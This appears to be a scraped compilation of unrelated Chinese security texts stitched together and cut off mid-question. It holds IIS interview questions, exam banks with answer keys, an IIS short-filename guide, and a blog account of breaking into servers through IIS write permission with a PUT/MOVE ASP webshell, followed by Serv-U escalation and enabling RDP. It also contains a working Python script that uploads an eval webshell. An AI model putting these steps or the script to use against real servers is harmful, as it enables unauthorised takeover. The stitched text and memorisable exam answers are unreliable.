题目11:IIS write漏洞利用
IIS相关面试题大全
1.什么是IIS?它用于做什么?答:IIS是Microsoft开发的Web服务器软件,用于在Windows操作系统上托管网站、Web应用程序和其他Web服务。
2.IIS支持哪些Web协议?请列出其中一些。
答:IIS支持HTTP、HTTPS、FTP、SMTP和NNTP等多种Web协议。
3.IIS的基本组件是什么?每个组件的作用是什么?答:IIS的基本组件包括Web服务、应用程序池、网站、虚拟目录和模块等。
Web 服务处理客户端请求并向客户端返回响应;应用程序池管理应用程序的运行;网站是将IIS配置为托管Web应用程序的基本单位;虚拟目录是指向Web内容的路径;模块是一种可插入式的组件,用于提供额外的功能。
4.什么是应用程序池?它的作用是什么?答:应用程序池是IIS中一个独立的工作流程,它用于隔离和管理Web应用程序的运行。
应用程序池可用于控制资源的使用情况,并提高Web应用程序的可靠性和性能。
5.如何配置IIS以提高Web应用程序的性能?答:可以通过以下几种方式来配置IIS以提高Web应用程序的性能:提高IIS服务器的硬件配置;使用应用程序池隔离不同的应用程序,防止一个应用程序影响另一个应用程序;启用输出缓存,缓存Web应用程序生成的响应;使用HTTP压缩来减少传输的数据量;使用动态IP限制来限制对服务器的攻击。
6.如何为IIS添加新的网站或虚拟目录?答:可以通过IIS Manager工具来添加新的网站或虚拟目录。
在IIS Manager中,选择“网站”或“虚拟目录”节点,然后单击“添加网站”或“添加虚拟目录”按钮。
然后按照向导中的提示进行操作,以完成新网站或虚拟目录的添加。
7.如何配置IIS以支持SSL安全连接?答:可以通过以下几个步骤来配置IIS以支持SSL安全连接:安装SSL证书;配置IIS以使用SSL证书;启用HTTPS协议;配置Web应用程序以使用SSL。
8.如何在IIS中启用Windows身份验证?答:可以通过以下几个步骤来在IIS中启用Windows身份验证:打开IIS Manager;选择网络站点,右键单击并选择“属性”;在“属性”对话框中选择“目录安全性”选项卡;单击“编辑”按钮,在“身份验证和访问控制”对话框中选择“基本身份验证”和“Windows集成身份验证”;确认更改并保存设置。
iis 短文件名枚举漏洞验证方法
iis 短文件名枚举漏洞验证方法
在IIS中,短文件名是由于长文件名被转换而生成的。
这些转换规则包括将
所有小写字母转换为大写,将长文件名中的多个“.”以最后一个“.”作为
短文件名后缀,以及特定的字符长度限制。
攻击者可以利用“~”字符猜解
或遍历服务器中的文件名,或对IIS服务器中的.Net Framework进行拒绝
服务攻击。
以下是一些步骤,可以帮助您验证IIS短文件名枚举漏洞:
1. 确定目标:选择一个您想要测试的网站或服务器,并确保您有权限对其进行访问。
2. 准备工具:您可以使用一些现有的工具,如“iis_shortname_”,来帮助您进行短文件名枚举。
确保您的环境满足工具的依赖要求。
3. 枚举短文件名:根据IIS的短文件名生成规则,尝试生成可能的短文件名。
您可以通过递增数字、使用特殊字符等方式进行尝试。
4. 检查响应:发送HTTP请求到目标服务器,并检查返回的状态码。
如果状态码为404,则表示文件不存在;如果状态码为200,则表示文件存在。
根据返回的状态码,您可以进一步枚举出更多的短文件名。
5. 分析结果:根据您枚举出的短文件名,您可以进一步分析目标服务器的文件结构、潜在的安全漏洞等信息。
需要注意的是,在进行IIS短文件名枚举时,要遵守法律法规和道德规范,不要对目标服务器进行未经授权的攻击或扫描。
同时,及时更新您的系统和应用程序,以确保您使用的是最新版本,并修补已知的安全漏洞。
网络安全1+X模拟习题+答案
网络安全1+X模拟习题+答案一、单选题(共80题,每题1分,共80分)1、常用于过滤SQL注入的函数( )A、empty()B、htmlspecialchars()C、addslashes()D、intval()正确答案:C2、Cookie的属性中,Domain是指什么( )?A、过期时间B、关联Cookie的域名C、Cookie的名称D、Cookie的值正确答案:B3、Nginx用来识别文件后缀的文件是( )?A、mima.confB、handler.typesC、handler.confD、mime.types正确答案:D4、SQLi 两大基本类别是( )A、字符型、数字型B、盲注、数字型注入C、有回显注入、盲注D、报错注入、延时注入正确答案:A5、__get()魔术方法在什么时候执行?( )A、当程序试图写入一个不存在或者不可见的成员变量时B、类被当成字符串时C、调用函数的方式调用一个对象时D、当程序试图调用一个未定义或不可见的成员变量时正确答案:D6、Cookie的属性中,Value是指什么( )?A、过期时间B、关联Cookie时间C、Cookie的名字D、Cookie的值正确答案:D7、以下哪一选项是搜索网段地址(比如C段)的语法关键字( )?A、hostnameB、portC、netD、city正确答案:C8、在MAC中,谁来检查主体访问客体的规则( )?A、管理员B、用户C、安全策略D、客体正确答案:C9、Apache解析漏洞中,相关配置是( )?A、AddHandlerB、HttpdinitC、ApacheHandlerD、Phpinit正确答案:A10、CSRF是什么( )?A、跨站请求伪造B、跨站脚本攻击C、注入攻击手法D、信息收集工具正确答案:A11、关于RPC说法错误的是( )A、远程过程调用时一种进程间通信机制B、RPC机制使用其他IPC机制C、不是windows默认启动进程D、RPC一般绑定在135端口上正确答案:C12、htaccess文件文件解析说法错误的( )。
IIS远程执行漏洞
IIS远程执行漏洞IIS(Internet Information Services)是微软的一种Web服务器软件,广泛用于windows操作系统上。
然而,IIS也存在一些安全漏洞,其中之一就是远程执行漏洞。
本文将详细介绍IIS远程执行漏洞的原理、危害以及如何防范。
IIS远程执行漏洞是指攻击者可以通过远程方法调用(RemoteMethod Invocation)或远程程序调用(Remote Procedure Call)等方式在IIS服务器上执行恶意代码的漏洞。
这种漏洞的危害非常大,攻击者可以利用远程执行漏洞执行任意代码、获取管理员权限甚至控制整个服务器。
远程执行漏洞的原理可以归结为IIS在处理一些用户请求时存在安全漏洞。
攻击者可以通过向IIS服务器发送恶意请求触发漏洞,然后执行恶意代码。
常见的远程执行漏洞包括IIS组件存在缓冲区溢出漏洞、解析URL路径时存在目录遍历漏洞等。
远程执行漏洞存在的危害主要有以下几个方面:1.执行恶意代码:攻击者可以通过远程执行漏洞在IIS服务器上执行任意代码,例如安装后门、恶意软件等,从而获取服务器的控制权限。
2.获取管理员权限:攻击者可以利用远程执行漏洞获取IIS服务器的管理员权限,然后可以执行任意操作,例如修改配置文件、删除数据等。
3.网站瘫痪:攻击者可以利用远程执行漏洞对IIS服务器进行拒绝服务攻击,导致网站无法正常访问,给正常运营造成严重影响。
为了防范IIS远程执行漏洞的攻击,可以采取以下几个措施:2.加固服务器配置:管理员应仔细配置IIS服务器,限制服务器对外部请求的响应,防止未经授权的远程调用。
3.使用防火墙:在IIS服务器外部设置防火墙,仅允许经过授权的IP地址访问服务器,限制了攻击者的远程执行漏洞的利用范围。
4.日志监控:管理员应定期检查IIS服务器的日志,监控异常请求,尽早发现并阻止攻击者的恶意行为。
5.安全审计:通过对IIS服务器进行安全审计,定期检查服务器的安全配置和漏洞情况,及时发现并修复远程执行漏洞。
高校邦期末测试
1 多选信息安全三要素包括:A. 保密性 B. 完整性 C. 可用性 D. 不可否认性2 多选以下下列哪些是常见的恶意代码?A. 病毒 B. 木马 C. 蠕虫 D. 后门3 多选我们常见的对信息安全的误区有哪些?A. 重安全产品,轻安全管理 B. 重外部安全,轻内部安全 C. 重局部安全,轻整体安全 D. 技术是万能的4 单选为什么密码很重要? A. 身份认证方式 B. 抵御攻击的第一道防线 C. 密码与个人隐私息息相关D. 以上都对5 多选为了增加上网安全,我们要尽量:A. 不要登入可疑网站 B. 不要打开或滥发邮件中不可信赖来源或电邮所载的URL链接 C. 打开邮件附件时要提高警惕 D. 确保电脑安装了最新的补丁和病毒库6 多选如何实现无线网络安全?A. 关闭网络的SSID广播 B. 启用WPA2 C. 采用较复杂的密码 D. 定期更改密码7 多选出于安全考虑,接收邮件时绝对不要打开()、()和()文件类型的邮件附件。
A. batB. comC. exeD. txt8 多选出于安全考虑,应如何正确使用手机?A. 正规安全渠道下载官方软件 B. 不点击不明的短信链接 C. 更新病毒库 D. 随意刷ROM9 多选信息安全管理体系包括:A. 风险管理 B. 合规性管理 C. 业务连续性管理 D. 人员和组织管理10 单选OSI()负责建立主机端到端连接。
A. 应用层B. 传输层 C. 网络层 D. 数据链路层11 多选安全方针和策略属于: A. 一般管理中的策略管理B. 信息安全保障工作的整体性指导和要求 C. 需要有相应的制定、审核和改进过程 D. 管理员的事12 单选DNS的端口号是()。
A. 80 B. 23 C. 53 D. 2113 单选下列()属于数据链路层存在的安全风险。
A. MAC泛洪 B. SYN泛洪 C. 漏洞D. IP欺骗14 单选下列()属于针对WEB应用的攻击。
A. 含有恶意代码珠网页 B. SYN泛洪 C. Smurf D. UDPFlood15 多选按漏洞利用方式分类,DoS攻击可以分为:A. 特定资源消耗类 B. 暴力攻击类C. 利用传输协议缺陷D. 利用服务程序的漏洞16 单选SYN泛洪是一种广为人知的攻击,攻击者向被攻击者发起大量的SYN包使用的是()。
(精华版)国家开放大学电大专科《网络应用服务管理》机考网考形考题库及答案
(精华版)国家开放大学电大专科《网络应用服务管理》机考网考形考题库及答案(精华版)国家开放大学电大专科《网络应用服务管理》机考网考形考题库及答案盗传必究试题题型包括:单选题、多选题、判断题、操作题和配伍题。
一、选择题题目1 在IIS中,使用同一个IP地址实现多个站点的方法是()。
选择一项:正确答案:主机头名方式题目2 默认情况下,Web服务所使用的TCP端口号为()。
选择一项:正确答案:80 题目3 在IIS中默认的匿名访问用户账号是()。
选择一项:正确答案:IUSR 题目4 在配置IIS时,如果想禁止某些IP地址访问Web服务器,应在“默认Web站点”属性对话框中的()选项卡中进行配置。
选择一项:正确答案:目录安全性题目5 在Windows Server中,FTP服务内置于哪个功能之中()。
选择一项:正确答案:IIS 题目6 默认情况下,FTP服务中文件传输所使用的TCP端口号为()。
选择一项:正确答案:21 题目7 以下关于FTP和TFTP的描述中,正确的是()。
选择一项:正确答案:FTP基于TCP协议,TFTP基于UDP协议题目8 在Windows Server 中,网络负载平衡适用于如下哪些应用功能()。
选择一项:正确答案:IIS 题目9 一个网络负载平衡群集内最多支持多少个节点()。
选择一项:正确答案:32 题目10 接收电子邮件的协议是()。
选择一项:正确答案:POP3 题目11 把电子邮件发送到收件人的电子邮箱中,所采用的邮件传输协议是()。
选择一项:正确答案:SMTP 题目12 下列主要用于电子邮件收发和管理的软件是()。
选择一项:正确答案:Outlook Express 题目13 在没有AD的前提下,部署微软证书服务可以选择如下哪几种类型()选择一项:正确答案:独立CA 二、多选题题目1 在IIS网站中,默认文档包括如下哪几个?()选择一项或多项:正确答案:index.html 正确答案:iisstart.htm 正确答案:Default.asp 正确答案:Default.htm 题目2 如下产品可以使用微软证书服务进行信息加密的有()?选择一项或多项:正确答案:SharePoint Server 正确答案:SQL Server 正确答案:Exchange Server 正确答案:Office 题目3 如下()功能可以使用故障转移群集功能实现高可用性。
老树开花-利用IIS写权限漏洞+Serv-U提权拿服务器
老树开花-利用IIS写权限漏洞+Serv-U提权拿服务器2011年03月31日星期四 15:43声明:本文没有任何技术含量,99.99%的内容是炒冷饭。
写这篇文章的目的在于:提醒大家不要忘了那些曾经很黄很暴力的漏洞,老洞常温,拿站很稳。
o(∩_∩)o第一大步:获取WebShell其实,一开始并没有准备搞渗透,只不过是想用IIS PUT Scanner 扫几台网络摄像头玩玩。
正应了那句老话:有心栽花花不开,无心插柳柳成荫。
Net Camera没找到,倒是意外地发现了2台有IIS 写权限漏洞的服务器。
怎么办?纠结,“整“!!!试了下IIS IIS PUT Scanner自带的上传功能,结果挂了!这时候千万不要放弃,经验告诉我,IIS IIS PUT Scanner的上传功能很不给力,完全是鸡肋嘛!换抢,试试老兵的IIS 写权限利用工具。
尝试PUT一个后缀为txt的ASP大马,返回信息:201 Created,运气很好,创建成功。
有的玩了:-)不过不要高兴的太早,马儿目前还是以TXT的格式躺在服务器里。
要使它跑起来,就要用到MOVE方法(类似Linux的重命名操作)将其转换成ASP格式,当然前提是服务器支持ASP,否则一切活动到此为止吧!RP大爆发!居然成功了,默认地址是/shell.asp。
如果MOVE方法不行,可以试试Copy 方法,做事不要一根筋嘛!第二大步:提权老规矩,执行CMD命令。
要是没CMD执行权限,找个可写目录上传下就O了。
我这里可以直接执行,一切都很顺利。
正因为如此,开篇才说本文没任何技术含量。
NetStat -an,神马情况,43958?Serv_U。
笑吧!提权在握。
果断点击Serv-U提权,啥命令也没改,使用默认Seru_U用户名和密码登录。
这么垃圾的管理员,肯定不会去改动滴。
接下来用同样的方法,执行了一个开3389的批处理,这种东西网上满天飞。
更棒的是,2003开3389后不用重启,直接登录。
信息安全基础(习题卷67)
信息安全基础(习题卷67)第1部分:单项选择题,共57题,每题只有一个正确答案,多选或少选均不得分。
1.[单选题]信息战的战争危害较常规战争的危害A)轻B)重C)不一定答案:C解析:2.[单选题]计算机网络组织结构中有两种基本结构,分别是域和A)用户组B)工作组C)本地组D)全局组答案:B解析:3.[单选题]管理信息大区主站与配电终端的通信方式原则上以( )为主。
A)光纤通信B)串口通信C)无线公网通信D)无线专网通信答案:C解析:4.[单选题]( )是建立有效的计算机病毒防御体系所需要的技术措施A)补丁管理系统、网络入侵检测和防火墙B)漏洞扫描、网络入侵检测和防火墙C)漏洞扫描、补丁管理系统和防火墙D)网络入侵检测、防病毒系统和防火墙答案:D解析:5.[单选题]以下哪个说法是正确的A)xcodeghost是一种可以直接远程控制手机控制权的攻击方式B)wormhole是一种可以直接远程控制手机控制权的攻击方式C)“心脏滴血”是一种可以直接远程控制手机控制权的攻击方式D)shellshock是一种可以直接远程控制手机控制权的攻击方式答案:A解析:6.[单选题]当在公共场所连接Wi-Fi时,下列哪一种行为相对更加安全?A)连接未进行加密的Wi-Fi热点答案:B解析:7.[单选题]以下哪种情况不会导致您的信息泄露A)在一些娱乐性质的网站/软件注册的时候填写真实的姓名B)在网上发具有标志性建筑物的自拍照C)分享自己的晚餐D)一个账号(QQ.微信)用于多种用途,如工作.游戏等,并添加了一些来路不明的好友。
答案:C解析:8.[单选题]更换部件或设备工作变更时,全程工作必须至少有()人以上参加,工作完成后及时做好维修记录。
A)1B)2C)3D)4答案:B解析:9.[单选题]用"rm-i",系统会提示什么来让你确认( )A)命令行的每个选项B)是否真的删除C)是否有写的权限D)文件的位置答案:B解析:10.[单选题]以下哪项不是对1SO27001的描述( )A)ISO27001是一个有关信息安全管理体系(ISMS)的国际标准B)ISO27001的理念是基于风险评估的信息安全风险管理C)ISO27001采用PDCA过程方法,全面、系统、持续地改进组织的信息安全管理体系D)ISO2700是关于IT服务管理的国际标准答案:D解析:11.[单选题]以下哪个不属于iis自带的服务()。
信息安全面试题
信息安全⾯试题1、渗透测试是通过恶意⿊客的攻击⼿段和⽅法,来评估⽹络系统安全性的⼀种⽅法,漏洞评估偏重于检查系统和服务时都存在安全问题,渗透测试主要执⾏漏洞来验证系统确实存在漏洞传统的渗透测试⽅法对⼯业控制系统基础设施会造成严重的影响,应当注意使⽤适当的⽅法。
⼯控设备检测:主要包括⼯控设备资产收集⼯控设备漏洞挖掘漏洞分析验证健壮性测试以及多层次多维多的安全检测等⼯控系统ICS是⼏种类型控制系统的总称,包括监控和数据采集系统SCADA 分布式控制系统DCS和其他控制系统以及⽣产应⽤服务等,⼯控设备检测服务主要是对系统的核⼼控制元件和⽹络组建进⾏检查2、SCADA系统:⾼分布式系统,数据采集和控制系统,给谁配⽔⼯程电⼒系统⽯油系统等电⽹系统。
SCADA风险分析:⼤量的可编程控制系统 PLC 可编程逻辑控制器,RTU(远程测控终端)和IED(智能电⼦设备)存在漏记炸弹或者其他楼栋部分采⽤国外设备操作系统、控制组件等未实现⾃主控制,可能存在安全漏洞被恶意控制终端服务数据被盗的危险。
3、常见的⼯业控制系统的漏洞:SQL注⼊漏洞弱⼝令漏洞系统服务运维配置不当4、Java反序列化漏洞将应⽤数据转换为其他格式的过程称为序列化,⽽将读取序列化数据的过程称为反序列化5、⼯控安全风险评估安全软件选择与管理防护验证:检查核⼼设备是否采⽤过离线环境验证测试的防病毒软件,6、常见协议ModbusModbus 协议定义了⼀个与基础通信层⽆关的简单协议数据单元(PDU)特定总线或⽹络上Modbus协议映射能够在应⽤数据单元(ADU)上引⼊洗⾐附加符7、cookieHTTP_referer 是head的⼀部分,当浏览器啊发送请求⼀般会带上refer告诉服务器是从哪个页⾯链接过来的,服务器据此可以获得⼀些信息Http_User-Agent ⽤来检测浏览器的使⽤操作系统版本号⽤户个⼈偏好等remote_addr 对应cookie ⽤户的IP地址8、拿到⼀个站点⾸先做的事whois 收集注册信息⽹站IP地址旁站 C 段⽹站服务器系统版本容器版本程序版本数据库类型⼆级域名防⽕墙维护者信息邮箱等mysql 的⽹站注册如5.0⼀下的版本没有 Information_schema这个系统表⽆法列表名等职能暴⼒跑表,5.0⼀下是多⽤户但操作,以上是单⽤户多操作。
CIW模拟试题----网络操作系统二
CIW模拟试题----操作系统安全(第二套试卷类型:客观(单选、多选、判断创建试卷时间:2010-11-一、单选题(每题2分,共25题题号:1在防止电子邮箱入侵中,以下哪一项是不适合的? DA.不用生日做密码;B.不要使用少于5位的密码;C.不要使用纯数字;D.自己做服务器题号:2为了保证Windows 2000服务器不被攻击者非法启动,管理员应该采取怎样的措施? BA.备份注册表;B.禾I」用SYSKEY;C.使用加密设备;D.审计注册表和用户权限题号:3你利用"缓冲区溢出"的攻击方法,利用WEB服务器的漏洞取得了一台远程主机的Root权限。
为了防止WEB服务器的漏洞被弥补后,失去对该服务器的控制,你应该首先攻击下列中的哪一个文件? DA.etc/.htaccess;B./etc/passwd;C./etc/secure;D./etc/shadow题号:4在C2安全等级规则中,自由访问控制”的含义是什么? DA.是安全审计师用来阻止其他的人下载未经授权的脚本和程序所做的规则;B.系统管理员具有限制任何用户花费多少时间来使用计算机的能力;C.是限制一个组或者安全边界对资源使用的一个策略;D.资源的所有者应当能够使用资源题号:5下列哪一个服务、命令或者工具让一个远程用户操作远程系统就像是操作本地终端系统一样? DA.FTP;B.FINGER; USE;D.TELNET题号:6Windows 2000最多支持多少个字符的口令?C A.14; B.64; C.127; D.128题号:7在Win 2000和Linux网络中,如用户已经登录后,管理员删除了该用户帐户那么该用户帐户将(A A. 一如既往的使用,直到注销;B.立既失效;C.会在12分钟后失效;D.会在服务器重新启动后失效题号:8以下不属于Linux的默认帐户的是:C A.Operator; B.Root; C.Guest;D.Adm题号:9以下不属于NTFS文件系统安全的项目是:DA.用户级别的安全;B.文件加密;C.从本地和远程驱动器上创建独立卷的能力;D.安全的备份题号:10在NTFS文件系统中,如一个共享文件夹的共享权限和NTFS权限发生了冲突,则以下说法正确的是:B A.共享权限优先NTFS权限;B.系统会认定最少的权限;C.系统会认定最多的权限;D.以上都不是题号:11在Windows 2000中,要将TELNET的NTLM值设成2用以提示管理员远程用户将尝试连接,应该输入什么命令?C A.TELNET -S; B.NBTSTA T;C.TLNTADMN;D.NTDS题号:12W indows 2000的本地安全数据库存储在(BA.%systemroot%\wi nnt;B.%systemroot%\wi nn t\system32\c on fig;C.%systemroot%\program files;D.%systemroot%\wi nnt'config题号:13下面哪一项注册表分支包含计算机信息(A A.HKLM; B.HKU;C.HKCR;D.HKCC题号:14在Windows 2000中网络管理员利用注册表不可以(DA.修改系统默认启动选项;B.设置系统自动登录;C.修改桌面配置选项D.删除应用程序题号:15以下不属于Windows 2000中的安全组件的是? CA.选择访问控制;B.强制登录;C.备份;D.审核题号:16在Windows 2000个人版中,可以定义用户是否能从网络登录的管理单元是:CA.计算机管理;B.TELNET 管理;C.本地安全策略;D.磁盘管理题号:17W indows 2000下的用于存储用户名的文件是? DA.SECRET;B.PASSWD;ERNAMES;D.SAM题号:18下列关于CA的说法错误的是?DA.CA是负责发布证书的一组机构B.CA负责为用户分配公共密钥和私人密钥C.CA可分为企业CA和独立CA;D.根CA可以没有证书题号:19你的计算机装有2个操作系统,分别是Windows 2000专业版和Windows 2000服务器版,因为你忘记了服务器版的密码从而使你进入不了系统,但是你能够进入专业版,你想要进入服务器版你应该怎么做? CA.进入专业版,修改C:盘下的boot.ini文件,使用服务器版指向C:盘;B.进入专业版,删除服务器版系统分区下的WINNT\CONFIG\SAM;C.进入专业版,删除服务器版系统分区下的WINNT\SYSTEM32\CONFIG\SAM;D.进入专业版,将专业版的系统文件复制到服务版所在的分区。
IISPUT漏洞复现
别忘了重启IIS (3)给internet来宾写权限
2、攻击方: (1)scanner检测是否可以PUT
(2)IISwritePUT文件:
底下报错的,记得看看来宾给了写权限没有 3、结果:
传进去了 预防措施:就是别给来宾写权限,不给网站写权限,关掉webDAV
其靶机那里开启了webdav就可以put然后write可以用burp抓包来实现
环境:32位的server 2003
IISPUT漏 洞 复 现
用到的工具:IIS put scaner和IIS write (其实不用工具也行,scanner只是检测能不能PUT,但是只要靶机那里开启了webDAV就可以PUT,然后write可以用burp抓包来实现) 漏洞出现的原因:开启了webDAV,网站文件对Internet来宾有写权限。 复现过程: 1、靶机方: (1)开启webDAV
IIS短文件漏洞成因,及修复方案
IIS短⽂件漏洞成因,及修复⽅案
0x00 IIS短⽂件名漏洞原理
为了兼容16位MS-DOS程序,Windows为⽂件名较长的⽂件(和⽂件夹)⽣成了对应的windows 8.3 短⽂件名。
在Windows下查看对应的短⽂件名,可以使⽤命令dir /x。
dir /x 查看显⽰结果,对应的⽂件名 444444~1.HTM 444444~2.HTM该短⽂件名有以下特征:
(1)只有前六位字符直接显⽰,后续字符⽤~1指代。
其中数字1还可以递增(444444~2.HTM),如果存在多个⽂件名类似的⽂件(名称前6位必须相同,且后缀名前3位必须相同)。
(2)后缀名最长只有3位,多余的被截断。
我们可以在启⽤.net的IIS下暴⼒列举短⽂件名,原因是:
(1)访问构造的某个存在的短⽂件名,会返回404;
(2)访问构造的某个不存在的短⽂件名,会返回400。
0x01漏洞危害
(1)猜解后台地址
(2)猜解敏感⽂件,例如备份的rar、zip、.bak、.SQL⽂件等。
(3)在某些情形下,甚⾄可以通过短⽂件名web直接下载对应的⽂件。
⽐如下载备份SQL⽂件。
举个例⼦,有⼀个数据库备份⽂件 backup_20180101.sql ,它对应的短⽂件名是 backup~1.sql 。
因此攻击者只要暴⼒破解出backup~1.sql即可下载该⽂件,⽽⽆需破解完整的⽂件名。
IIS6.0PUT漏洞的利用
IIS6.0PUT漏洞的利⽤title: IIS6.0 PUT漏洞tags: 环境配置,漏洞利⽤grammar_cjkRuby: true⼀、IIS6.0PUT漏洞的利⽤为了验证是否是webdav组件的问题,我们现在把webdav禁⽤掉,⽴刻就会在put下⾯显⽰NO,这就是因为IIS PUT SCANER通过webdav 查询的时候查不到PUT了。
为了下⾯的实验,先把webdav打开。
然后利⽤桂林⽼兵的iiswriter然后提交数据包,会在服务端⽣成⼀个1.txt的⽂件,但是这个⽂件是⽆法被iis解析的,所以要利⽤到的是MOVE,主要⽬的是为了将txt的⽂件修改为asp的,从⽽可以将⽂件变成可执⾏的脚本⽂件。
验证⼀下,确实存在shell.asp⽂件⽤菜⼑链接菜⼑成功连接⼆、IIS6.0PUT漏洞的利⽤槽点1.利⽤思路总结:⾸先PUT(txt)数据包到服务器端,然后利⽤MOVE⽅法将上传的数据包脚本更为shell.asp。
再访问该脚本即可2.环境配置:以上是理想情况,实际环境中需要服务器端具备以下前提IIS6.0写权限开启IIS6.0允许访问脚本资源权限开启(也可利⽤解析漏洞解决)IIS6.0的webDAV扩展设为允许3.利⽤途中可能产⽣的问题PUT asp脚本到IIS6.0会返回404所以只能PUT IIS6.0不能解析的⽂件,如jpg,txt格式未开启写权限时返回403在属性中的主⽬录下开启写⼊权限以上权限配置完后PUT脚本显⽰401(猜测:服务器的安全配置)这⼀步没有思考到解决问题的思路,通过搜索关键字IIS 得出win系统的network⽤户权限管理需要设置读取和运⾏,写⼊返回状态码207代表利⽤成功但是如果未开启脚本资源访问权限,则实际并没有更改成功(返回未207)三、IIS6.0PUT漏洞的利⽤脚本--python#encoding="utf-8"import requests#分别需要put,move的urlput_url = 'http://192.168.111.139/2.txt'move_url = 'http://192.168.111.139/2.txt'move_headers = {'Destination':'http://192.168.111.139/shell9.asp'}#put的脚本put_data = "<%eval request('apple')%>"#最终的连接脚本,但似乎连接不成功post_data = {'apple':''}try:response = requests.request('PUT',url=put_url,data=put_data)if response.status_code == 200:response = requests.request('MOVE',url=move_url,headers=move_headers)if response.status_code == 207:response = requests.post(url='http://192.168.111.139/shell9.asp',data=post_data)print(response.content.decode("gb2312"))else:print(response.status_code)except:pass顺带复习下IIS6.0的解析漏洞IIS6.0解析漏洞分两种1、⽬录解析以*.asp命名的⽂件夹⾥的⽂件都将会被当成ASP⽂件执⾏。
渗透测试-题库
渗透测试-题库1、以下哪种⽅式可以利用ngnix解析漏洞来将⽅件当作php来执⽅( ) [单选题] *A、 /xx.jpg%00.php(正确答案)B、 /xx.jpg.phpC、 /xx.php.jpgD、 /xx.php%00.jpg2、apache默认解析的后缀中不不包括 [单选题] *A、 php3B、 php5C、 phtmlD、 php1(正确答案)3、IIS曾经出现过的漏洞不包括哪个 [单选题] *A、解析漏洞B、 IIS溢出漏洞C、 PUT漏洞D、反序列化漏洞(正确答案)4、中间件未出现过以下哪个漏洞 [单选题] *A、命令执行B、文件解析C、反序列化D、序列化(正确答案)5、IIS不不可以解析哪个后缀 [单选题] *A、 aspB、 asaC、 cerD、 cep(正确答案)6、之前版本的中间件未出现过解析漏洞的是 [单选题] *A、 apacheB、 iisC、 tomcat(正确答案)D、 ngnix7、以下数据库只能通过字典枚举数据表的是 [单选题] *A、 mssqlB、 oracleC、 mysql < 5.0(正确答案)D、 mysql > 5.08、要向现有表中添加列,应使⽅哪个命令 [单选题] *A、 ALTER(正确答案)B、 CHANGEC、 INSERTD、 UPDATE9、linux 环境下,查询⽅日志⽅件最后100⽅行数据,正确的⽅方式是 [单选题] *A、 mv -100 logB、 grep -100 logC、 cat -100 logD、 tail -100 log(正确答案)10、一个⽅站存在命令执⽅漏洞,由于服务器不能上外网,这是我们可以利用什么样的⽅式将文件上传到服务器器 [单选题] *A、 FTPB、 powershellC、 vbsD、 echo(正确答案)11、在linux下为某个⽅文件添加权限,命令chmod 741 test中的4代表什什么权限[单选题] *A、执行权限B、只读权限(正确答案)C、只写权限D、所有权限12、在linux安装应用,哪个命令不需要 [单选题] *A、 ./install(正确答案)B、 makeC、 make installD、 ./configure13、下⽅面的哪个命令可以打印linux下的所有进程信息 [单选题] *A、 ls -dB、 ls -lC、 suD、 ps -ef(正确答案)14、拿到一个windows下的webshell,我想看一下主机的名字,如下命令做不到的是[单选题] *A、 hostnameB、 systeminfoC、 ipconfig /allD、 set(正确答案)15、在拿到⽅个windows服务器下的webshell之后,我想看看当前在线的用户,下面这些命令可以做到的是 [单选题] *A、 dir c:\usersB、 net userC、 tasklist /v(正确答案)D、 net localgroup administrators16、在测试sql注入时,下哪种⽅式不可取 [单选题] *A、 ?id=1+1(正确答案)B、 ?id=2-1C、 ?id=1 and 1=1D、 ?id=1 or 1=117、关于DOM xss和寻常xss下面说法正确的是 [单选题] *A、 DOM xss是服务端代码造成的而寻常xss不是B、 DOM xss不是服务端代码造成的而寻常xss是(正确答案)C、两者都是服务端代码造成的D、两者都不是服务端代码造成的18、以下说法正确的是 [单选题] *A、 SSRF是跨站请求伪造攻击,由客户端发起B、 SSRF是服务器端请求伪造,由服务器发起(正确答案)C、 CSRF是服务器端请求伪造,由服务器发起D、重放攻击是将截获的数据包进行重放,达到身份认证等目的19、php提供以下哪些函数来避免sql注⽅入? [单选题] *A、 mysql_real_escape_string(正确答案)B、 escapeshellargC、 htmlentitiesD、 htmlspecialchars20、如果一个网站存在CSRF漏洞,可以通过CSRF漏洞做下面哪些事情 [单选题] *A、获取网站用户注册的个人资料信息B、修改网站用户注册的个人资料信息C、冒用网站用户的身份发布信息D、以上都可以(正确答案)21、以下最有效的防范上传漏洞的方式是什么 [单选题] *A、用黑名单的方式验证文件后缀,上传后保持文件名不变B、验证文件头,确定是否为图片格式,上传后保持文件名不变C、验证上传文件的内容,匹配关键字来确定是否允许上传,上传后保持文件名不变D、不做任何验证,上传后的文件名由系统自动修改为随机字符串加图片后缀的形式(正确答案)22、利用CSRF漏漏洞可以做什么 [单选题] *A、攻击者利用受害者的cookie执行恶意操作(正确答案)B、攻击者盗取受害者的cookie执行恶意操作·C、攻击者利用受害者的凭证执行恶意操作D、攻击者盗取受害者的凭证执行恶意操作23、如何防御CSRF漏洞,下面说法不正确的是 [单选题] *A、检查HTTP Referer字段是否同域B、使用验证码C、使用一次性TokenD、使用POST方式提交(正确答案)24、在编写目录扫描工具时哪种请求方式可以增加扫描速度 [单选题] *A、 GETB、 HEAD(正确答案)C、 POSTD、 PUT25、如下哪个响应报头是让我们跳转到新的位置 [单选题] *A、 Location(正确答案)B、 ServerC、 HostD、 WWW-Authenticate26、关于" WannaCry "勒索病毒软件描述正确的是 [单选题] *A、利用RDP协议漏洞传播B、利用SMB协议漏洞传播(正确答案)C、利用HTTP协议漏洞传播D、利用FTP协议传播27、关于文件包含漏洞描述错误的是 [单选题] *A、只有PHP语言存在文件包含漏洞(正确答案)B、文件包含漏洞可以分为本地文件包含和远程文件包含C、 include函数可以用来包含文件D、 require函数也可以用来包含文件28、在web页面中增加验证码功能后,下面说法正确的是 [单选题] *A、可以防止注入攻击B、可以防止上传漏洞C、可以防止文件包含漏洞D、可以防止数据重复提交(正确答案)29、下面关于SSRF漏洞描述正确的是 [单选题] *A、 SSRF漏洞就是服务端请求伪造漏洞(正确答案)B、 SSRF漏洞无法修复C、 SSRF漏洞只存在与PHP语言中D、 SSRF漏洞是针对浏览器的漏洞30、系统疑似被入侵,查看系统登录日志 wtmp,正确的命令是 [单选题] *A、 cat wtmpB、 ls wtmpC、 last –f wtmp(正确答案)D、 mv wtmp31、关于XSS漏洞分类说法错误的是 [单选题] *A、存储型XSSB、反射型XSSC、扩展性XSS(正确答案)D、 DOM型XSS32、下面关于CSRF漏洞的防御方法不正确的是 [单选题] *A、验证RefererB、添加token验证C、增加验证码D、更换浏览器(正确答案)33、若需要修改TOMCAT的监听地址,应修改哪个配置⽅文件 [单选题] *A、 tomcat.xmlB、 server.xml(正确答案)C、 wexmlD、 